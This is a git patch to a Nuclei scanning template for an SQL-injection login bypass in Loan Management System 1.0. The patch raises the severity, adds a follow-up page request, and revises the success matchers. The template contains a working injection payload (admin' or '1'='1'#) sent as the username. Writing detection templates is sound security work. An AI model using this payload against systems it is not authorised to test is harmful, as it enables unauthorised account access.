From 8bca76cf6dcc7216c01593eea44620d9991134db Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Jul 2022 18:08:25 +0530
Subject: [PATCH] Update loancms-sqli.yaml

---
 vulnerabilities/other/loancms-sqli.yaml | 26 ++++++++++++++-----------
 1 file changed, 15 insertions(+), 11 deletions(-)

diff --git a/vulnerabilities/other/loancms-sqli.yaml b/vulnerabilities/other/loancms-sqli.yaml
index 0805ecf22e..df5abaddac 100644
--- a/vulnerabilities/other/loancms-sqli.yaml
+++ b/vulnerabilities/other/loancms-sqli.yaml
@@ -3,12 +3,12 @@ id: loancms-sqli
 info:
   name: Loan Management System 1.0 - SQLi Authentication Bypass
   author: arafatansari
-  severity: medium
-  reference:
-    - https://www.exploit-db.com/exploits/50402
+  severity: high
   description: |
     Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
-  tags: sqli,bypass,cms
+  reference:
+    - https://www.exploit-db.com/exploits/50402
+  tags: loancms,sqli,bypass,cms
 
 requests:
   - raw:
@@ -19,18 +19,22 @@ requests:
 
         username=admin'+or+'1'%3D'1'%23&password=nuclei
 
+      - |
+        GET /index.php?page=home HTTP/1.1
+        Host: {{Hostname}}
+
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '1'
+          - 'window.start_load'
+          - 'Welcome back'
+          - 'Loan Management System'
+        condition: and  
 
       - type: word
-        part: header
+        part: body
         words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
+          - 'login-form'
+        negative: true